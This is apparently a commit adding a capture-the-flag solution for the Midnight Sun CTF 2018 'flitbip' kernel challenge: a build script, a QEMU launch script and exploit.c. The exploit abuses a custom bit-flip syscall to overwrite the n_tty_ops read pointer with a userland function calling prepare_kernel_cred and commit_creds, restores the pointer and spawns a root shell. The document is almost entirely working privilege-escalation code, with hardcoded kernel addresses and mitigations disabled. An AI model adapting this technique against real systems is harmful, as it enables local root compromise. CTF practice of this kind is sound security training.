arb. bit-flip, no mitigations

midnightsunCTF2018-flitbip/compress.sh

@@ -0,0 +1,11 @@
+#!/bin/sh
+
+#gcc -w -o exploit -static $1
+musl-gcc -w -s -static -o3 exploit.c -o exploit -masm=intel
+cp exploit ./fs/
+
+cd fs
+find . -print0 | cpio --null -ov --format=newc | gzip -9 > ../initramfs.cpio.gz
+cd ..
+
+./run.sh

midnightsunCTF2018-flitbip/exploit.c

@@ -0,0 +1,62 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <fcntl.h>
+#include <signal.h>
+
+unsigned long flit_count = 0xffffffff818f4f78;
+unsigned long n_tty_ops  = 0xffffffff8183e320;
+unsigned long read_ptr   = 0xffffffff810c8510;
+
+void flitbip(unsigned long addr, unsigned long bit)
+{
+	syscall(333, addr, bit);
+}
+
+void get_shell(void){
+    puts("[*] Returned to userland");
+    if (getuid() == 0){
+        printf("[*] UID: %d, got root!\n", getuid());
+        system("/bin/sh");
+        exit(1337);
+    } else {
+        printf("[!] UID: %d, didn't get root\n", getuid());
+        exit(-1);
+    }
+}
+
+void arb_write(unsigned long addr, unsigned long initial, unsigned long final)
+{
+	unsigned long i = 0;
+	for (i=0; i<64; i++)
+	{
+		if ((initial ^ final) & (1ULL << (i)))
+		{
+			flitbip(addr, i);
+		}
+	}
+}
+
+unsigned long prepare_kernel_cred = 0xffffffff81033e92;
+unsigned long commit_creds = 0xffffffff81033d41;
+void escalate()
+{
+ char* (*pkc)(int) = prepare_kernel_cred;
+ void (*cc)(char*) = commit_creds;
+ (*cc)((*pkc)(0));
+}
+
+int main()
+{
+	flitbip(flit_count, 63);
+
+	arb_write(n_tty_ops + 0x30, read_ptr, escalate);
+
+	char c;
+	scanf("%c", &c);
+
+	arb_write(n_tty_ops + 0x30, escalate, read_ptr);	// To avoid crash, bcz n_tty_read is corrupted if this isn't done
+
+	get_shell();
+
+	return 0;
+}

midnightsunCTF2018-flitbip/run.sh

@@ -0,0 +1,9 @@
+#!/bin/bash
+qemu-system-x86_64 \
+    -m 128M \
+    -kernel ./bzImage \
+    -initrd ./initramfs.cpio.gz \
+    -nographic \
+    -monitor /dev/null \
+    -append "nokaslr root=/dev/ram rw console=ttyS0 oops=panic paneic=1 quiet" 2>/dev/null \
+    -s